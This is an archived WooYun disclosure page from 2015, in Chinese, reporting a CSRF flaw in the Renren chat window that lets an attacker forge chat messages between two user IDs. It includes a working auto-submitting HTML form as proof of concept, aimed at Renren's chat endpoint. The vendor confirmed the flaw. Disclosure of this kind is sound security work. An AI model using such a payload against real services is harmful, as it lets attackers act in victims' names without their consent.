当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141118

漏洞标题:人人网聊天窗口存在CSRF可劫持发送消息

相关厂商:人人网

漏洞作者: jeary

提交时间:2015-09-14 17:35

修复时间:2015-10-30 18:32

公开时间:2015-10-30 18:32

漏洞类型:CSRF

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-14: 细节已通知厂商并且等待厂商处理中
2015-09-15: 厂商已经确认,细节仅向厂商公开
2015-09-25: 细节向核心白帽子及相关领域专家公开
2015-10-05: 细节向普通白帽子公开
2015-10-15: 细节向实习白帽子公开
2015-10-30: 细节向公众公开

简要描述:

我觉得这个危害挺大的,求不小厂商。。

详细说明:

人人网和好友的聊天界面是这样的:

rld0.jpg


发送消息时的数据包是这样的:

rld1.jpg


然而,这个也没有验证tk
仅仅需要三个参数即可发送消息。
内容,发送人和接受人的id即可,id很容易获取
这个也只能用来定向进行攻击,你可以劫持任意一个人向另外一个人发送任意消息。
poc:

<html>

<body>
<form action="http://wpi.renren.com/muc_chat" method="POST" enctype="text/plain">
<input type="hidden" name="&lt;message&#32;fname" value="&quot;&quot;&#32;from&#61;&quot;859601814&#64;talk&#46;m&#46;renren&#46;com&quot;&#32;to&#61;&quot;878045198&#64;talk&#46;m&#46;renren&#46;com&quot;&#32;type&#61;&quot;chat&quot;&gt;&#10;&lt;richbody&#32;type&#61;&quot;dialog&quot;&#32;localid&#61;&quot;&quot;&gt;&#10;&lt;font&gt;test12345&lt;&#47;font&gt;&#10;&lt;&#47;richbody&gt;&#10;&lt;&#47;message&gt;&#10;" />

</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>


访问此poc即可发送消息,这里我使用了两个账号进行 测试。
复现使用两个账号然后更改poc里面的id即可。

漏洞证明:

如上。

修复方案:

:)

版权声明:转载请注明来源 jeary@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-15 18:31

厂商回复:

谢谢,非常感谢

最新状态:

暂无